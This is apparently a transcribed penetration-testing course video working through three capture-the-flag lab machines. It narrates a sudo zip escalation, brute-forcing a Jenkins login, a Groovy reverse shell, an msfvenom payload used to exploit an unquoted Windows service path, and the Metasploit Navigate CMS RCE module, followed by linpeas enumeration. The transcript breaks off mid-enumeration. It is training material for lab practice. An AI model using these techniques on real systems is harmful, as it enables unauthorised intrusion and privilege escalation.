do, because it tells us what we can run as sudo without a password. Okay, so sudo, remember, is what we can run as elevated privileges. So in this instance, we can run the zip feature with no password. So we can literally run sudo zip and it should work. Okay, so it's not requiring a password. Awesome. Issue here. How can we take sudo zip and abuse that feature for us to be able to escalate into root? That is the question. If we have a no password, which this comes up a lot in boxes like this, like CTF style boxes, if we have a no password, how can we do this? So we need to go take a look at that. We come over here. I got a site for you. Go out to the Google machine. Okay, and you're going to type in GTFO bin, just like that. It's really GTFO bins, but we took what showed up first. Okay, GTFO bins, great website. Let's make it bigger. Great website. You come in here, you can look for the different type of escalations that you want. We have a pseudo escalation, okay, pseudo escalation. And we come in here, we say, okay, we've got pseudo, and then we're looking for zip. We can type in zip in the search bar, but we also have zip right here. So if we want to do a pseudo zip, we go into zip, look for pseudo, and it says, here's how you use pseudo as a zip in order to get root privileges. Okay. And so it says in here, if the binary is allowed to run as a super user by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate, or maintain privileged access. It's telling us what it's doing. All we have to do here is copy this, come over, paste this, okay, come back, copy this. This should drop us into a shell. This should drop us into a shell. Let's see what happens. All right, we have been dropped into a shell here. As sudo, we dropped into a shell. So with that, if we type in ID, we are now root. Why? Because sudo runs elevated. We said, okay, as elevated user, we want to go ahead and drop into a shell here. We did this. Now we can go cd to root, ls, cat out our flag. Congrats on rooting this box. And that's it. So hopefully that was informative for you. This was a little bit on the, I would say, easier side of the machines. We're trying to go in order of difficulty. This one is something that you get a few different options for you. It shows you how to mount. It shows you how to enumerate multiple web directories and really tie a bunch of information together, which is nice. And then you get to see a classic sudo no password escalation, this time using zip. But if you see in the GTFO bins, when we went back and just highlighted sudo, there are a lot of escalations if sudo privileges are enabled in order to get to go from low level to root. So it's quite fun and quite common, by the way. So that's it for this video. I will go ahead and see you in the next one. On to the next machine, which is Butler. Now, Butler was created by Joe Helly, aka the mayor. Thank you so much, Joe, for creating this machine for us. And this machine is going to be a Windows-based machine that is going to allow us to explore privilege escalation, since when we first used Blue went right to root for us. So this one's going to give us some experience with privilege escalation. Now, I have this accounts.txt file open just to show you that the administrator password for this one's a little bit different than the other Windows machine. This file is included in your download. So if you downloaded this, you've installed it, you should have found the accounts. That way you can go and get the IP address that was pulled from this machine. So with that out of the way, I went ahead and ran nmap again, similar process. Now here we have 7680 open and 8080 open. I'm going to go ahead and you can ignore that for now. I'm going to go ahead and go out to the website 168.138.138. And we're going to see if it would help if I put 8080 on the end of it. We're going to see what's there. Okay. All that's here is a login page for Jenkins. So we don't have much here yet. There are a few things that we can do here. We can try to do some brute forcing. We can look for directory busting. We could try to do a view page source real quick and see if there's any information in here that might indicate what version we're running on, and see if there's anything in here that we can get maybe an exploit off of. And really, there's not going to be much. We could go to Google and do a quick Jenkins exploit and see if we can find any sort of Jenkins exploits. And there's this here about attacking Jenkins. There's one here about attacking Jenkins. This one has remote code execution. And we can kind of click through these and see what we're looking at for this. So it looks like 2015 Jenkins has some deserialization attacks. 2018 had authentication bypassing. And it looks like, let's see, We've got check script, remote code execution. There's a lot of different, looks like, attacks in here. There's some password spraying that you can do against this, which we'll talk about here in a minute. Dumping secrets, Groovy scripts, reverse shells with Groovy. Okay, so there's quite a bit in here. This one is a little bit, let's see if it's the same or not. This is saying, hey, here's how you get code execution. There's 3 ways to get code execution, which ideally we want code execution. We could do some brute forcing here, but I'm going to show you a way to do brute forcing without having to do this. We can do some remote code execution, and it shows, hey, there's a few different ways to do it. In this instance, we're going to need authentication. There's no way around this. For using Jenkins, we need authentication to get in here. So it's pretty neat. They show you a few different ways to get this exploit, and everything's pointing back to Groovy, or it looks like there's a PowerShell way of doing it, which is neat. This article here tells you, hey, when you're logged in, you can log in, and it shows you how to attack this. This looks a little bit older. So there are ways around this, and we can do some research into this to see, okay, how do we exploit Jenkins? All signs so far are really pointing to authenticated attacks. There are some here that are older that looks like they're bypassing authentication. Just to save time and skip ahead, we're going to go ahead and avoid those, though it's not out of the realm of possibility that you explore those, go down these rabbit holes, check it out, see if there's any sort of attack that you can exploit here. So our main focus is, how do we log into this application? We haven't found any sort of version information, which is unfortunate. The other thing that we can do is we can go to Google and we could say Jenkins default password. And it says the default password is admin password, which is what's created the very, very first time you log in. I think it asks you to change it once you log in, though I am not 100% confident on that. And we can come in here and try admin password. And we're going to see that doesn't work. Unfortunately, we don't have default credentials here. So we have the possibility of doing some brute force directory busting on this. Maybe there's a configuration file or something sitting on the back end that we can get access to. I'm going to tell you, just to save time, that is not the case. Though if you're thinking through that methodology or that mindset, that's fine. I think that's okay. The other option is this port here, this 7680. We could try connecting to this. You can use Netcat, you can use Telnet. There's options here where you can try, for example, you could try telnetting, but you could do apt install telnet because it doesn't come by default anymore. And then you would just go telnet, IP address 138.138, and then that port number, which would be 7680. And you could see what's listening on there. This is a odd port. It's trying it, it's not connecting. It's one of those weird ones that you don't really see that often. And I'm telling you from my experience, I don't see that often. You can go out and Google, hey, what does this port do? You could also go and say, hey, I know this port's open, so I'm gonna go ahead and just try 7680 here. That's gonna stall out. It's not a web address either. So we're running out of options on how to actually connect to that. That could be a false positive that it came back on as well. We're not sure because we're not getting any actual connection into that machine. So with that being said, we need to brute force Jenkins. Now you saw Metasploit had a module. Somebody showed that in one of these. We're going to do it the burp sweep method because that's my favorite go-to. And I'll show you the burp sweep method. If you want to play around with some of these other methods, like that's shown in here. Sorry, I'll make this bigger, but that's shown in here. Feel free to go use this in Metasploit and see if you can brute force passwords, usernames, etc. But from here, what we're going to do is we're going to use burp sweep. So I'm going to use a tool called Foxy Proxy. Since we're in 2021, I'm going to go ahead and show you how to install this just to get this up and running. If you just type in Foxy Proxy, literally go the first link you get with standard, go in here, hit install. Mine's already installed, so it's going to ask me to remove it. All you gotta do is install it. It should show up right here in the corner. Little fox, okay? You go to options for your first time setting it up. And in here, all you wanna do is hit add. And then I'm gonna cancel this. Let's edit this so you can see what my settings are. I just named it burp.
127001, our local host, and our port of 8080. What this does is we use Burp Suite once in the course, and we had to go in and change our settings and our preferences and come in here. This just does it for us automatically with like the flip of a switch. So when we open up Burp Suite, let's go ahead and do that. You can just type in burp up at the top and open up Burp Suite. So we're going to use this proxy, right? We're going to proxy through this. I'm going to cancel any requests for updates. We're just going to use what's in here. This is 2021 2.1, which is new enough for me. I've made my font size really big, so yours might look a little bit different. This is just for video recording purposes. But in here, we have a proxy. Okay, this is what we're going to be listening on. We're intercepting some traffic. We showed this a little bit in the last, the enumeration section. But here you can see 127.001.80.80 is where the traffic is flowing through. And I'm going to go ahead and intercept traffic. So like I'm going to come in here and I'm going to say admin password on this attempt, which I know is not going to work, but we have the traffic now intercepted, hopefully in our Burp Suite. Maybe if I actually turned on this would work. Let's try admin password, hit enter. Okay, now it comes up. So you can see the request comes through in this inspector. We're getting a post request. We're trying to pass this password through admin password sign in form. Okay. What I'm going to do is we can send this to repeater. I'll send it to repeater first. Then I'm going to send this to intruder. So just right click. You can do Control R or Control I. Both work. Control R to send to repeater. Control I to send to intruder. But in this instance, we can just push this request, hit send. And this will just say, hey, 302 found. You can follow the redirection. It's going to say 401 unauthorized. All right, so that's one thing. We could see in here that the set cookie comes remember me equals, and there's nothing in here. So that could be something to look forward to a little bit later. But what we want to do is we want to come in and we could technically brute force. We could be like password 1, go send that one and keep coming through until we can follow the redirection and find an actual login. Doing this with repeater will take forever. Good thing is we have something called intruder. So if you come in here and you go into the positions tab right here, go ahead and hit clear. What we're going to do is set a couple of positions. We're going to come in here and we're going to say, okay, admin, I see you. I'm going to go ahead and say add. Double click on admin, hit add. Double click on password, hit add. We are basically setting up our parameters or our variables that we're going to use. So we're going to perform an attack where we give usernames and we give passwords, and it's going to try those in combination. So really, when we use multiple facets here, we're either going to be using Pitchfork or Cluster Bomb. So Pitchfork is great for what is credential stuffing, which we're going to be trying, hey, I know this user has this password. So we'll say admin has the password of password, and we may have found that in a breach. Okay, so we'll try admin to password, and then we'll try next user with that password. So it's 1-to-1. Now, Cluster Bomb is, I'm going to try every single user with every single password in the list. So if I've got 5 users and 10 different passwords, that's going to be 50 different attempts because it's going to try user 1 with all 10 passwords, user 2 with all 10 passwords, and so forth. So we're going to use a cluster bomb attack because we have no idea what the username or the password is. Now, in order to save time, I'm going to just type in a few different payloads here. Realistically, we would guess some different usernames that would go in here. Like, for example, admin, administrator, Jenkins. Okay, if we knew like an IT person or somebody who might be running this, we might put in their name. But in this instance, we might just want to run with these 3. And then on a bad password list, we might just go copy like the worst 100 passwords or worst 500 passwords and then just hit paste and paste it in here. In this instance, I'm going to type out some bad passwords. So maybe password, Jenkins. How about password with a capital P, Jenkins with a capital J? Okay, something like password 1, etc. Now we have 3 different users, 5 different passwords, 15 different attacks. 3 times 5 is 15. So we're going to try admin first with all these passwords. Then it's going to go through and try administrator with all these passwords. Then it's going to try Jenkins with all these passwords. Okay, so we're going to hit start attack. And what's going to happen is it's going to start pushing through. And we have to be very cognizant and watch this and watch for any sort of changes that might happen in this. Okay, it's very, very subtle. Okay, when we're looking through this, if there's a status change, sometimes these will go like 401, or we could follow the redirection in the settings, by the way. We could select that. There's also advanced stuff that we'll get into with, like, we can use grep to look for different changes in here. We'll talk about that a little bit later, but we also cover that in the external pen test playbook course, because that is something that we do when we're doing password spraying attacks. Here in this instance, we are looking for subtle changes like the length that is here. If you notice, everything's 302, so there's no difference in status changes. There's no difference in like error codes or anything. What we're seeing though is 318, 318, 318, 318. All of a sudden there's a 314 on Jenkins. What changes here? What is the response that changes compared to this? Okay, here we get a J session ID cookie, where here before we did not have that. Here we get a cookie, and then what changes? Here we already have a J session ID cookie, and we're getting a login error because we have more data that we're storing in here. We're already authenticated. So now it's gone from 318 down to 314 for this one request into a bunch of 408s to 409 range. So this one small tiny little request here, this little length difference, could be the indicator that there's something different. So you have to really scroll through this, use your eagle eyes, and make sure that you are looking through this with a fine-tooth comb. Here, I am seeing Jenkins as a valid login, and we're going to go attempt that. I'm going to turn this off. We're going to go attempt to log in with Jenkins. And hopefully we get in. Okay, we do get in. So from here, we do have the ability to run code execution. Let's see what they say. So we need to find a place to execute this code. This is okay. I've seen better write-ups on this. So going around and doing some research, you will find places to execute code in here. If you go into Manage Jenkins, there should be a bunch of different tools that are in here. Scrolling through, there is a command line here that you can run from a shell, which seems pretty interesting. It's just getting into a shell on this machine from a script. There's also a script console here. Okay, the script console is interesting because it's in Groovy. We've seen Groovy a few times. You might even type something like Jenkins script console exploit, something like that. And you can see exploiting Jenkins Groovy script console in multiple ways. So this is somebody that came in here and did this. Another thing that you can just read through and see, they're using Metasploit. We can use manual methodology, which is right here. There's a GitHub reverse shell, which honestly, if you just go to Google and you just type in Groovy reverse shell, the first thing that comes up should be your ideal one, which looks like that's the same one they had too. But this is what I like to use. You can come in here, make this a little bit bigger. You can just go raw, copy this, and then we'll paste it and we'll talk about it. So copy that, paste it in here. So we need to utilize this for a reverse shell. This is using command.exe to perform the reverse shell. It's giving the port of 8044. You can choose whatever port you want here, but I'm going to keep it the same. Why not keep it simple? Okay, so I'm going to make this bigger. Netcat MVLP 8044. We'll set up a listener. On here, we have localhost. We're not running localhost, okay? We're going to give it 192.168.138.131 or whatever your attacker IP is. So whatever your IP of your Kali Linux machine is, this is what you want to get. So this is just a reverse shell. All it is written in is Groovy instead of the other ways that you've seen it so far. So it's going to reach out to us on this port, and when it reaches out to us, it's going to execute command.exe. Here is the whole process of that code. All we have to do is execute this, which I might need to make this a little bit smaller to actually see that. see, we'll just go all the way over to the right, and I'll just run this. Okay, and it's stalling, which is usually a good sign, meaning that we are likely getting in, and we do have a shell here. So we are now, who am I? We are now butler on butler. We are not system. We're not authority system. So we need to take this a little bit further and see if we can elevate privileges. Now, there are several tools and methods that we can utilize. We are going to look at a classic form of privilege escalation on this machine. If I were going through this machine, the first thing that I would do is I'd look at system info. I would want to know what machine this is, what the build is. You can see we're running on Windows 10. If this was running on an older edition, this is a Windows 10 Enterprise, which is nice. We're running on Windows 10, so the chances of there being an exploit for this build may be pretty low. I would look at this build, see if there's anything there that we can use or abuse in order to get escalation. But the intended path on this, as of right now, is a different method. So we're going to look through that, and I'm going to show you kind of the basic enumeration process that we can use. Again, if you're curious and seeing this in way more detail, you are welcome to join us in the Windows Privilege Escalation course and go through this a little bit more. So with that out of the way, there is a tool out there called WinPeas. So I'm going to go back. I'm kind of already cheating and going ahead because I downloaded this earlier. But if you search WinPeas, remember LinPeas? This is the Windows version of LinPeas. So just go to the first thing that you see. Now in here, if you scroll down a little bit, they have the different, they'll have different downloads. So we can go into the exe here, WinPeas exe. And you'll see an SLN. We don't want the SLN. We just want to be able to download the latest. So go into download the latest version. We're not going to compile this. We're just going to trust what they've got. So come in here, download WinPeas x64.exe right here. All right. I'll say okay on this because I want to show you again what I do. If you come into root and you open a new tab, make sure you move this. So I moved, I don't know if I actually downloaded it. Let's see. WinPeas, I didn't download it, but I moved WinPeas, whatever it's called, WinPeas 64. Make sure you do that. Move that into your transfer folder, or ensure that you're going to have it where you want to host it. I actually just moved it and I renamed it winpeas.exe because it's a lot easier to just type that out on a machine. And so a little bit keeping it simple. So with that, I'm going to go ahead and just do this, which is Python 3-m for module, http.server, and port 80. So we're going to host up this transfer folder. In here, I'm going to go ahead and go to my shell, and I want to go to my user folder or somewhere that I can write. It looks like I'm in the Jenkins folder, but I like to go, first of all, cdc user. Okay. Actually, cdc users. Do a dir in here. Butler should have read access or read-write access, so we're going to go there first. What we might do too is see if there's anything in here. Like we might look at like well, he's got some downloads in the downloads folder, it looks like. An indicator in here is looking at the different times. Sometimes when you're doing these CTF machines, like what was the last time this was updated? So there might be something in the downloads folder that could be of interest, like CD downloads. Go dir real quick. Looks like WiseCare 365 was installed. Who knows what that is? That could be something of value to us later, but that is not. That is information. It's just not exactly what we're looking for at this exact second. We can go around, maybe CD to the desktop, see if there's anything there. Nothing there either. Okay. So we just want to be able to put a file somewhere that's writable. So I'm going to put WinPeas here in Butler's folder, just his base folder here for his user. And all we're going to do is use a tool called certutil to transfer this over. So certutil.exe. We're going to do a -URL cache like this, -F for file. And then we're going to grab the 192.168.138.131/WinPeas. We're going to call it WinPeas. Okay. We should do a dir, and it should exist right here. If you need a second to catch up, go ahead and catch up. Otherwise, we're going to go ahead and move on. So now we just run winpeas.exe. And special note, yours might not be in color. You can run this reg add command, or should be able to run this. I'm not sure as a lower level user actually. So you might have to suffer through the first time with seeing it not in color, but just follow along on my screen if you can't run this reg add, but you're going to have to run this and then run this again. Otherwise, we're just going to kind of scroll through this and see. This is similar to what we saw with linpeas. Red means something we want to look at and kind of scroll through, okay? So we're just going to scroll through this. There's a lot of output on this machine. I'm looking for anything that quickly stands out for me. These protection enabled, they really don't matter to me at this moment. I'm looking for something that might just like, hey, this immediately stands out. So it's giving us drive information. Most of this is just disk enumeration at this point. Nothing of value so far. It's looking up printers, tells printers, is looking up named pipes, which is fine. Going through, this is telling us explicit credential events, which these are plain text credentials if we have them. I'm not seeing anything here. So we'll scroll through these, keep going. Printing account logon events, these are just events again. So WinPeas has gotten beefier over the years. It used to be pretty quick to scroll through. I'm going to actually cheat a little bit and scroll down. PowerShell script blocks. Let's keep going here. Okay, users information. It's telling us the users on this machine. And again, this is all different kinds of enumeration. Now, the SE impersonate privilege could be good for a potato attack, but that's a different type of attack. We're not looking for that at the moment. But that could be something, that's why it's highlighted in red, something we do cover in the escalation course. So it's telling us more about user accounts that are on this machine, any sort of RDP sessions that might exist, any sort of folders. Heavy, heavy, heavy enumeration to scroll through. Okay, we're in process information. I'm going to skip past processes. I'm not too concerned about what processes are running. That could take a long time to scroll through. When we're doing privilege escalation, we are looking for quick wins. So we got some service information, and in here, there are some, okay, something does show up, and this is all lighting up red. So I'm looking and reading through here. We have the ability to modify services, like we have the ability to modify Jenkins.exe. Perhaps we can modify that and write a shell code here and get a shell, since we're running as this user. But I'm not sure that that's going to run as administrator. It looks like file permissions here. We would have to be able to hijack that binary. So I'm going to scroll through. Again, this is disabled. We might be able to enable this. VMware, I don't ever attack. I don't know if that's really truly an attack method, even though it shows up a lot. The other one that showed up that's interesting is here. We have this Wise Boot Assistant, which was that WiseCare that we saw downloaded. So that's of interest because we did see that downloaded. We do see this running. And what's weird is, okay, it's running, it's auto running, and it says no quotes and space detected. It said you can modify this service, all access, file permission is run as administrator. That's very, very interesting. So let's talk about what we're seeing. And I know this could be a little bit overwhelming because this is just kind of throwing privilege escalation in your face from a Windows perspective, and that can get pretty messy pretty quick depending on what you're looking for. What we're looking at here and why this is important is we are looking at a privilege escalation that will allow us to get system on this machine. And this is called unquoted service paths. I'm going to show you what this looks like on the Windows machine. But basically what's happening is the service executable that is here, the service executable, it is located in a path that is not enclosed in quotes. Okay, so you see no quotes. And there's a space detected. So you see a space, you see a space. Okay, the issue here is that when we're running this, when Windows runs this and it looks for this service, when you start the service up, it's literally looking for every instance that exists before the space and it's trying to add .exe. So it first tries cprogram.exe, then cprogramfiles.exe. Okay, it keeps going on. Here, cwise.exe or wise/wise.exe, wisecare.exe. Okay, and what's happening is, I think my machine might have just shut down on me. I'm going to go ahead and turn this back on. As I was going to show you, what's happening is we can take an executable, malicious executable, basically malware, and we can upload it to this machine, place it in one of these folders. We don't have to overwrite this, by the way, not the boottime.exe. We can literally just write something called wise.exe. As long as we have permission to write into this folder, we can do that, and then we can run it, and hopefully we can get a shell out of that, because the system is going down and it's looking for wise.exe, and when it finds it, it will run that first, and then we're going to attack it based on this. So I want to show you really quick on the Windows side of the things. Of course, I am locked out of the administrator account as well. Okay, so what I've done in here is I've gone out and I've looked for this service in the reg edit. You don't have to follow along, but this is an HKey local machine system, current control set, services, and then the Wise boot assistant. When we say unquoted service path, if we look at this image path here, there should be, to prevent this attack from happening, quotes around this. There are not quotes around this. So this is called an unquoted service path, meaning we're not taking the literal path of this. Thus, when we run C program files x86 wise all the way through for this boot time, it's going to do those checks. Now, I don't know if we have write permissions to the C program files folder as a user, but we certainly should have write permissions here since we installed this, it looks like, as the user. So if we have write permissions to this wise folder, we can go ahead and just drop a file in there called wise.exe, and it will try to run wise.exe in that folder. Okay, so it'll go C program files, wise.exe. It's going to exploit this situation here, and hopefully we will get a shell out of this. So let's go ahead and give this a try. What I'm going to do is I'm going to scroll all the way down here and look at all this mess. There's a lot. Now, there are other tools that could easily identify this, by the way. Like this tool is probably the most comprehensive, and that's why I showed it to you. But there are tools called PowerUp, which will do this. There are exploit checkers that will do this. There are other ways to run through machines like this and do escalation checks. I'm showing you the most probably popular tool, but it is the most comprehensive and it can be overwhelming. So please don't feel overwhelmed. You will, with practice and over time, learn how to decipher this, read through it really fast, and know kind of what you're looking for, or train your eyes for those things. Again, this is just introductory, ground level type stuff. So what we want to do is we want to generate some malware. I'm going to go ahead and stop sharing this folder real quick because I'm going to put malware into this. So we're going to use MSF Venom, and we're going to use this to generate some shell code here. Okay, so we're going to do a payload of Windows x64. We're going to do a shell reverse TCP. And if you wanted to do this with Metasploit, you could do like Meterpreter, go down that path, etc. For this instance, we're going to use no Metasploit. We're just going to do this all manually. We're going to give our listening host, which is us, 192.168.138.131. This is your attacker machine. We're going to give a listening port. I'm going to call this 7777. Do a file type of executable and an output of wise.exe. You could also do this as wise.exe, just like that. All right. So we're going to go drop this once it generates into the Wise folder. So I'm going to go ahead and put this back up as a transfer. So my transfer folder is back up and running. I'm also going to open a new tab, and I'm going to netcat nvlp, and we're going to listen on all 7s because that's where we said that this is going to work. So we know this is 64-bit architecture. We saw that, by the way, when we were running system info. We saw that this is Windows 10, 64-bit architecture. So this is all from our little bit of enumeration that we did. Going back to this machine, we need to go ahead and get into that folder. So that folder was in C. So we're going to cd C, and we're going to go ahead and do a quick dir. And it's easier for me to just copy like this and then do a cd paste like that. Get you in there, cd into Wise. Okay, and now we're in the folder that we want to be in. So if we type in dir, we got WiseCare 365. So we're going to put Wise in here. It's going to try to run wise.exe, and we should be good to go. So we'll see how this works. What we need to do is run cert util one more time. Same way, we're going to use this to transfer a file over, which is nice. HTTP, just like this, 192.168.138.131/wise.exe. And we're going to call this wise.exe, just like that. Hopefully it comes over. Do a dir. Okay, it's sitting in here. That's great. Now the question is, how do we run this? If we just do a ./ or if we just go wise.exe, don't hit enter. If we do wise.exe, that is going to run this as the regular user. It's going to run it as Butler. You will pop a shell back here as Butler, and we will have gain no ground whatsoever. So what we need to do is we need to stop the service that's running. Now the service that's running is the Wise Boot Assistant. Okay, we can query that to find that out. I'm just telling you how to do it, just a little bit easier. You can go Google what the running service is called. You could look through WinPs and it'll tell you as well. I'm just guiding you along, giving you a quick step ahead here. So we're going to do a service stop on Wise Boot Assistant. It's all one word like this. Okay. Okay, so it's saying stop pending. It's going to go ahead and stop that. We can do, I believe, SC query of Wise Boot Assistant. Okay, and you can see that this is stopped. So now that it's stopped, what we're going to do is we're going to start it. When we start it, it's going to execute as the system. It's going to run that shell code as system, and hopefully we get a shell back as system. So you see the shell came through. We say, who am I? Authority system. And that is it. So this is a very, very classic, absolutely classic way of exploiting a machine. So looking through the printout of WinPs, again, there are other tools out there that do this. There's actually even a check that will do this from a one-liner. There are privilege escalation checklists and guides that you can go through. So when you get on a machine, you say, hey, I'm going to check this first, then I'm going to check this next. And you go through the checklist and make sure you leave no stone unturned. You kind of get your low-hanging fruit like you saw with the Linux. Like we'll check history first because maybe there's a password stored in history. Then we'll check sudo and see if we have any privileges and kind of go down the easy list. Same thing with system info. I want to see what the build is. If I can recognize the build, there's something there from trained eyes. And then kind of just go down the list as to what we need to do. Running WinPs is something that we can execute fairly easy, run through it. Same thing with PowerUp or other tools like that. And we can go through and find issues like this. And this one is a classic. If you do any CTF machines, I guarantee you will see this in the future. So this is a good one to show you as an example and build you up into privilege escalation and get your feet wet in the game. So that's it for this machine. We're going to go ahead and move on to the next one. Welcome to this box titled Black Pearl. This box was created by Alec and is a Linux machine. Thank you, Alec, for creating this machine. We're going to go ahead and start off with our Nmap scan. As always, if you haven't found your IP address, go do that. Get your Nmap scan going. If you just want to follow and watch along and continue from here, that's fine too. Now, our Nmap scan only shows us here with port 22, DNS 53, and port 80. As discussed in the past, 22 likely not the option, so that really leaves us with 80 because 53 is likely not the option either, though it does come into play a little bit. Now we can see we have a default web page here just by looking at the title, this Nginx. We have a welcome to Nginx, meaning if we go out to this website, we go 192.168.138.130, and I turn off my proxy and refresh, we get a welcome to Nginx page. So what do we need to do? We probably need to fuzz this and see where we can get with this information. So we're going to do a quick fuzz on this. Something else that's, I think, hidden in here. Let me view the page source. It always helps to define the page source. In here, you can see that there has been a little nice thing added in where it says alec@blackpearl.tcm. So that's your webmaster. Let me make it a little bit bigger. alec@blackpearl.tcm. This is a big hint giveaway, something we haven't covered quite yet. And we're just going to keep that in the back of our mind. But we know that we need to access this web page. We're going to go ahead and try to do some directory busting first and see if we can't get there with that. So let's go ahead and take a look at the directory busting, and then we'll go from there. So new tab, we're going to do do -w user share word list. This should be starting to feel a little bit familiar, right? Dir buster for me, and then just tab through to get to the medium list, and then go ahead and say fuzz, and then we're just going to do -u with the IP address. For me, it's 130/fuzz. Run that and see if we can't find anything, and immediately we get something called secret. So let's go ahead and go over to /secret. It's a file. Let's go ahead and save that. Let's open the containing folder, and let's just open this if we can. Open up with mousepad. And it said, oh my god, you got root. Just kidding, search somewhere else. Directory busting won't give anything. This message is here so that you don't waste time directory busting this particular website. Alec. Okay, so what he's telling us is you're not going to find anything on this directory. Well, we're likely not going to find anything hunting down port 22. We're likely, I mean, we could attack maybe Alec at 22 with some weak passwords and see what we find. But that's not the entry port. And here we have 53, which means that this is running DNS, and it's running DNS for a reason. So we're going to do some recon on this. What we're going to do is we're going to just say, and I'm actually going to run it over here. We're just going to use a tool called DNS Recon, and we're going to say -r, and that is for our range of 127.0.0.0/24. We're just scanning the local host because that's where our machine is. And then we're going to provide the IP address of the box that we're actually looking for, which is 130. And then for D, you can literally type in whatever you want. We can just type in blah. D is just needed there for a dictionary, but we're not going to use it, and it's still going to be able to find it. If we take it out, it won't work, which I'll show you. Or D for domain, I'm sorry, not dictionary. D for domain. We're providing a domain, but it's going to look for that domain, but if we don't provide it, it won't search. So it requires the domain. Even though we don't have the domain or don't know the domain, it's still able to find it. So what it found was 127.0.0.1 which means that there's DNS pointer record here to this web page. We need to go ahead and add that to our DNS in Etsy hosts. Okay, so what we can do is just nano Etsy hosts. And in here, you can see that we have our 127.0.0.1 for localhost and 127.0.1.1 for Cali. We need to add in the IP address, 168.138.130. We're just creating a DNS record here for blackpearl.tcm. So now we're going to say, hey, blackpearl.tcm allocates to this IP address, and the DNS is going to do its magic. So we're going to Control X, hit Y, hit enter, and then in your web browser, go ahead and close it completely if you had one open, and then we're going to go back, open it up, and hopefully this will work. First go. So http://blackpearl.tcm. Okay, and if this happened correctly, you should see this page. Okay, if for some reason it did not load for you, go ahead, go back. Close this out again, give it a second, let it repopulate. So here we are brought to this My Info page. Now we have seen this before, and again, we can get some information disclosure here. We can see that we're up against a Linux box. We can see the name of the box, Debian, system type. There might be some sort of execution we can run against this. But again, when we're up against a directory like this, we want to do some directory brute forcing and see if maybe we can get access to this machine or get access any further than what we are. So we're just going to want to fuzz the directory one more time and see if that leads to anything. As of right now, this info page is giving us info, yes, but there might be more hiding under the covers. So we're going to go ahead and go back, and we're going to just use fuff one more time. User share wordless, and I'm never going to get tired of saying that. Dirbuster, if I can type and then do my tabby thing. All right, so we're going to fuzz here, and then this time around we're going to do a -u, and we're going to do blackpearl.tcm, not the IP address, blackpearl, and we're going to say fuzz. Okay, and we're going to let this go through. We're going to look for anything that might show up, and immediately navigate shows up for us. So that's interesting. Let's go ahead and just navigate to navigate, shall we? Okay, we've got navigate CMS version 2.8, copyright 2021. And we're going to go ahead and just dig a little bit further into this. So my go-to is always Google. Just, hey, navigate CMS. We could look for exploit. We could also look for default credentials if there are any, see if we can go in there. But look at this. We've got unauthenticated remote code execution from exploit database. We can run it manually, or we can run it with Metasploit. So that's nice. We have options. So actually an exploit database is with Metasploit as well. I'm sure there is manual code out there, but for this one, since we haven't run Metasploit really much in the capstone, we're going to go ahead and mix it up and use a little bit of Metasploit here. Otherwise, I encourage you to go back and try this manually as well. But we're going to go ahead and open up Metasploit and see what it's got to offer for us. So MSF console. Let this load real quick. And this gives us the module in here. I mean, we could search for it, but it's easier to just honestly, just copy this. And we should probably verify. Okay, so this is tested against Navigate CMS 2.8. This module exploits insufficient sanitization in the database protect method and allows us to bypass authentication. The module then uses path traversal vulnerability that allows authenticated users to upload PHP files. Together, we can get remote code execution. So it's chaining attacks here. First, it's going and it's bypassing authentication. It's then uploading malware, which uses a path traversal vulnerability to do that via the authenticated user, and then uses that to do remote code execution. So this is a chained attack here. This is pretty unique. So we're going to go ahead and go in here and just paste. Hopefully this works. This is Metasploit 6 I'm on. And it does. Okay, so when we're in here, we can just say options. And we're asked for an R host. We're asked for our port. We have our R port. We're asked for our L host, which is fine, I think. And then all we need is to just set that. PHP interpreter reverse TCP looks good, I think. All we're going to do is just make sure we set our R host here, which is going to be 192.168.138.130, but we also need to set the server virtual host. So we're going to say set vhost to blackpearl.tcm. Okay, everything else looks good. This is automatic target. We could do a show targets real quick and see if there's any other targets. There's not, just automatic. This is our attacker IP address, so that's fine. L port's fine. /navigate as the target URI looks fine. I always like to do options one more time, just get the visual of it. Everything looks good to me. So I'm gonna go ahead and just hit run, cross my fingers, hope and pray. Looks like we're getting a interpreter session back. So let's hit enter. Might be rushing the process here a little bit. We'll see if it works. Might take just a second to load. Okay, and from here we have a shell, so we can jump into a shell by typing shell. And in here, we don't see anything, but if we do who am I, you can see www-data, which means we're going to have to do privilege escalation again. Now we are in this funky little area. We don't see like a shell, a normal shell type, right? We don't see like, hey, user at machine name. So we need to generate a TTY shell, and there's an easy way to do that. If you go out to Google, TTY shell, if you just Google that, you'll see spawning a TTY shell. Now, my favorite method of doing this is using Python, but we need to have Python on the machine. So you'll see what this does here in a second, but there's other ways to do it. Python's a quick way if Python is on the machine. So what we're going to do is just say which Python. And you can see user bin Python exists on this machine, so that's where it's calling out. We're going to go ahead and just copy this. And I'm going to modify this a little bit. I like bin bash over just sh. So I'm going to open this up in a notepad or a text editor. Paste this in here. Add a BA in front of that for bash. Copy. And then we're going to go paste this into this shell. Okay. Now that looks a little bit better. Now we have an actual shell here. So what we need to do is we need to, again, go through our privilege escalation capabilities. In this instance, running sudo-l, we can try, see what's there. Sudo command not found. Running history, we could see if anything's there. Nothing. Great. So we need to check for privilege escalation, and we can do that using something like linps, right? This should be familiar now. We're going to do a print working directory. I'm going to go ahead and cd over to temp because that's where I like to move things. We are in temp, and now what we're going to do is I'm just going to upload this file. So we're going to do a wget, and I don't have it hosted yet, but I'm just preparing it. So 192.168.138.131 attacker IP address /linps.sh and then linps.sh. This should be familiar. Now we're going to come in here and we're going to control plus here. We're going to go ahead and we're going to cd to transfer. You should have one of these by now. ls linp should be in there. So all we're going to do is python 3-m simple, HTTP server. I'm thinking of my Python 2 days, and port 80. Now we should be able to run this. Okay. Let's go ahead and let's see if it actually generated. Did I call out linps? I did. Let's see, ls linps.sh. So I'm going to go ahead and just chmod +x linps.sh /linps.sh. Okay, now that's going to run. So let's let this run for a second. I'm going to pause the video, let it run through, and then we're going to come back and look at the results. Okay, so the results have come back, and we're going to look at it from the bottom up this time. Only because last time we took it from top down, we're going to go bottom up. The top section is really very system heavy and what users are there, and it's a lot of good information, but at the same time we can kind of just skip down to the bottom and scroll up. Like here we're looking for usernames or passwords that might exist, and we're just kind of going through and trying to see if there's anything in here where we could find that would be relevant. Remember, we're looking for red, and we're looking for red yellow specifically. That would be good. I'm going to skip over some of this, and I'm looking for, in particular, some different things. Now, if there's any sort of password or credential here, that could be interesting if there's like a file named password or password credential, and you kind of learn what these are. You're really looking for something to stand out. None of these really stand out. These are all common kind of just paths on the system and common files on the system. Now, if we keep scrolling up, what I'm looking 